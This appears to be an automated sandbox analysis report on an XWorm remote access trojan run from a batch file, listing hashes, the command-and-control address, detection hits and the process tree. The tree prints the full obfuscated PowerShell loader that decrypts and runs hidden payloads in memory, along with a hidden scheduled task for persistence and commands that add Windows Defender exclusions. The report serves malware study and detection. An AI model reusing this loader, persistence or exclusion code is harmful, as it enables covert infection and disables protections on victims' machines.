xworm | e5f8aa6ad4a268a2d8d5a7bf151dd9df36cf5a9fdcd76ee1bcfc357a245c3d2e

Analysis

max time kernel
16s
max time network
18s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
21-05-2024 22:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

422KB
MD5

e87e3e968e80526bc362bfdd1e4bf266
SHA1

4fee6fa14c33b6de899cfd3cd9dc8fc9de2a1a7c
SHA256

e5f8aa6ad4a268a2d8d5a7bf151dd9df36cf5a9fdcd76ee1bcfc357a245c3d2e
SHA512

edd5bbcc9b42ff5535fc65adc28277255deffeaa7c1d8b4d4e0599a1d9df15f700a30a052ae991069f9bd3d2b9eede700fd202b282ebc8358c75d9175cfc8abd
SSDEEP

12288:xTsiBZqGoi2wPrgGoBUUmCXb0imm9dJe/PN:tsi+GoQjUvGHN

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

messages-gamespot.gl.at.ply.gg:55729

127.0.0.1:55729

Attributes

Install_directory
%Temp%
install_file
chrome.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/872-31-0x000002069E3C0000-0x000002069E42E000-memory.dmp	family_xworm
behavioral2/memory/1992-73-0x00000294B9CE0000-0x00000294B9D14000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

46 1992 powershell.exe

flow	pid	process
46	1992	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
872	powershell.exe
1992	powershell.exe
4344	powershell.exe
3296	powershell.exe
1116	powershell.exe
5492	powershell.exe
1220	powershell.exe
3056	powershell.exe
1940	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

45 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
45	ip-api.com

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exewermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133608051289027126"	chrome.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1220	powershell.exe
1220	powershell.exe
872	powershell.exe
872	powershell.exe
3056	powershell.exe
3056	powershell.exe
1940	powershell.exe
1940	powershell.exe
1940	powershell.exe
1992	powershell.exe
1992	powershell.exe
1992	powershell.exe
3272	chrome.exe
3272	chrome.exe
4344	powershell.exe
4344	powershell.exe
4344	powershell.exe
3296	powershell.exe
3296	powershell.exe
3296	powershell.exe
1116	powershell.exe
1116	powershell.exe
1116	powershell.exe
5492	powershell.exe
5492	powershell.exe
5492	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

3272 chrome.exe
3272 chrome.exe
3272 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeIncreaseQuotaPrivilege	3056	powershell.exe
Token: SeSecurityPrivilege	3056	powershell.exe
Token: SeTakeOwnershipPrivilege	3056	powershell.exe
Token: SeLoadDriverPrivilege	3056	powershell.exe
Token: SeSystemProfilePrivilege	3056	powershell.exe
Token: SeSystemtimePrivilege	3056	powershell.exe
Token: SeProfSingleProcessPrivilege	3056	powershell.exe
Token: SeIncBasePriorityPrivilege	3056	powershell.exe
Token: SeCreatePagefilePrivilege	3056	powershell.exe
Token: SeBackupPrivilege	3056	powershell.exe
Token: SeRestorePrivilege	3056	powershell.exe
Token: SeShutdownPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeSystemEnvironmentPrivilege	3056	powershell.exe
Token: SeRemoteShutdownPrivilege	3056	powershell.exe
Token: SeUndockPrivilege	3056	powershell.exe
Token: SeManageVolumePrivilege	3056	powershell.exe
Token: 33	3056	powershell.exe
Token: 34	3056	powershell.exe
Token: 35	3056	powershell.exe
Token: 36	3056	powershell.exe
Token: SeIncreaseQuotaPrivilege	3056	powershell.exe
Token: SeSecurityPrivilege	3056	powershell.exe
Token: SeTakeOwnershipPrivilege	3056	powershell.exe
Token: SeLoadDriverPrivilege	3056	powershell.exe
Token: SeSystemProfilePrivilege	3056	powershell.exe
Token: SeSystemtimePrivilege	3056	powershell.exe
Token: SeProfSingleProcessPrivilege	3056	powershell.exe
Token: SeIncBasePriorityPrivilege	3056	powershell.exe
Token: SeCreatePagefilePrivilege	3056	powershell.exe
Token: SeBackupPrivilege	3056	powershell.exe
Token: SeRestorePrivilege	3056	powershell.exe
Token: SeShutdownPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeSystemEnvironmentPrivilege	3056	powershell.exe
Token: SeRemoteShutdownPrivilege	3056	powershell.exe
Token: SeUndockPrivilege	3056	powershell.exe
Token: SeManageVolumePrivilege	3056	powershell.exe
Token: 33	3056	powershell.exe
Token: 34	3056	powershell.exe
Token: 35	3056	powershell.exe
Token: 36	3056	powershell.exe
Token: SeIncreaseQuotaPrivilege	3056	powershell.exe
Token: SeSecurityPrivilege	3056	powershell.exe
Token: SeTakeOwnershipPrivilege	3056	powershell.exe
Token: SeLoadDriverPrivilege	3056	powershell.exe
Token: SeSystemProfilePrivilege	3056	powershell.exe
Token: SeSystemtimePrivilege	3056	powershell.exe
Token: SeProfSingleProcessPrivilege	3056	powershell.exe
Token: SeIncBasePriorityPrivilege	3056	powershell.exe
Token: SeCreatePagefilePrivilege	3056	powershell.exe
Token: SeBackupPrivilege	3056	powershell.exe
Token: SeRestorePrivilege	3056	powershell.exe
Token: SeShutdownPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeSystemEnvironmentPrivilege	3056	powershell.exe
Token: SeRemoteShutdownPrivilege	3056	powershell.exe
Token: SeUndockPrivilege	3056	powershell.exe
Token: SeManageVolumePrivilege	3056	powershell.exe
Token: 33	3056	powershell.exe
Token: 34	3056	powershell.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

chrome.exe

pid	process
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe
3272	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exechrome.exe

description	pid	process	target process
PID 720 wrote to memory of 1220	720	cmd.exe	powershell.exe
PID 720 wrote to memory of 1220	720	cmd.exe	powershell.exe
PID 720 wrote to memory of 872	720	cmd.exe	powershell.exe
PID 720 wrote to memory of 872	720	cmd.exe	powershell.exe
PID 872 wrote to memory of 3056	872	powershell.exe	powershell.exe
PID 872 wrote to memory of 3056	872	powershell.exe	powershell.exe
PID 872 wrote to memory of 1540	872	powershell.exe	WScript.exe
PID 872 wrote to memory of 1540	872	powershell.exe	WScript.exe
PID 1540 wrote to memory of 4572	1540	WScript.exe	cmd.exe
PID 1540 wrote to memory of 4572	1540	WScript.exe	cmd.exe
PID 4572 wrote to memory of 1940	4572	cmd.exe	powershell.exe
PID 4572 wrote to memory of 1940	4572	cmd.exe	powershell.exe
PID 4572 wrote to memory of 1992	4572	cmd.exe	powershell.exe
PID 4572 wrote to memory of 1992	4572	cmd.exe	powershell.exe
PID 1992 wrote to memory of 3272	1992	powershell.exe	chrome.exe
PID 1992 wrote to memory of 3272	1992	powershell.exe	chrome.exe
PID 3272 wrote to memory of 3336	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3336	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 3084	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 1052	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 1052	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe
PID 3272 wrote to memory of 5016	3272	chrome.exe	chrome.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "& {}"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SlSTUHH3vjTFF6yZmXkQecEZjJqcfO2AzXY6guJbvCw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SHhPUHLYvn7pQ31hTUN8w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GXmwo=New-Object System.IO.MemoryStream(,$param_var); $NERXN=New-Object System.IO.MemoryStream; $AFVdE=New-Object System.IO.Compression.GZipStream($GXmwo, [IO.Compression.CompressionMode]::Decompress); $AFVdE.CopyTo($NERXN); $AFVdE.Dispose(); $GXmwo.Dispose(); $NERXN.Dispose(); $NERXN.ToArray();}function execute_function($param_var,$param2_var){ $gNhZA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VuTFK=$gNhZA.EntryPoint; $VuTFK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$rxwmR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Loader.bat').Split([Environment]::NewLine);foreach ($pGzCS in $rxwmR) { if ($pGzCS.StartsWith(':: ')) { $GlIcB=$pGzCS.Substring(3); break; }}$payloads_var=[string[]]$GlIcB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_934_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_934.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_934.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_934.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "& {}"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SlSTUHH3vjTFF6yZmXkQecEZjJqcfO2AzXY6guJbvCw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SHhPUHLYvn7pQ31hTUN8w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GXmwo=New-Object System.IO.MemoryStream(,$param_var); $NERXN=New-Object System.IO.MemoryStream; $AFVdE=New-Object System.IO.Compression.GZipStream($GXmwo, [IO.Compression.CompressionMode]::Decompress); $AFVdE.CopyTo($NERXN); $AFVdE.Dispose(); $GXmwo.Dispose(); $NERXN.Dispose(); $NERXN.ToArray();}function execute_function($param_var,$param2_var){ $gNhZA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VuTFK=$gNhZA.EntryPoint; $VuTFK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_934.bat';$rxwmR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_934.bat').Split([Environment]::NewLine);foreach ($pGzCS in $rxwmR) { if ($pGzCS.StartsWith(':: ')) { $GlIcB=$pGzCS.Substring(3); break; }}$payloads_var=[string[]]$GlIcB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
6⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff8bdaab58,0x7fff8bdaab68,0x7fff8bdaab78
7⤵
PID:3336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:2
7⤵
PID:3084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:8
7⤵
PID:1052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:8
7⤵
PID:5016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:1
7⤵
PID:1604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:1
7⤵
PID:1668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:1
7⤵
PID:1196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4412 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:8
7⤵
PID:2024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4560 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:8
7⤵
PID:3532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1936,i,2079288405457852339,16956340323304057374,131072 /prefetch:8
7⤵
PID:4740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\chrome.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'chrome.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5492

C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "1992" "2992" "2920" "2996" "0" "0" "3000" "0" "0" "0" "0" "0"
6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5768

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
cf79afe218875a641e9f0936a8ff23cc

SHA1
4bcb790eca61976d44201b7680a9a74f5260120f

SHA256
ab1ad3d5ba99a5a17623bc432d99117fb03a989a73453307b15104c2783c6270

SHA512
619cea881b0dff375cc08f6cf8983f2d1c91876ec9899728a2bcdb4fcfd3aa6c9611d5d0d76d5f4fdd7ecf83e1ae914dd23aa313fb45375dd4f38754656934d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
f2bb425c85989387396b6fea4631039c

SHA1
9eae442dbecfc5ac3e090f7adc13c082f3a1e4b2

SHA256
f80ac549fc01100bee9d0a0a4fa7e0df4ffe184e893f8fe52872f911ad20071f

SHA512
93236ec86e11bf1fc0f7a58aa0dba7229c456e374fc7dada9be0e7461644eb9d97856db41a0fa7c2b4f5e250534232af177ba7a3002514b67f55717ae63b55d9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
d905a30973c3fb0015bd26a462aa25cd

SHA1
c06d58f76d5143e950e4fe5742976c183667ce59

SHA256
4e07b297bd5371118e6b1e8a4e3369cc040d60e3301b625ae12637702addf427

SHA512
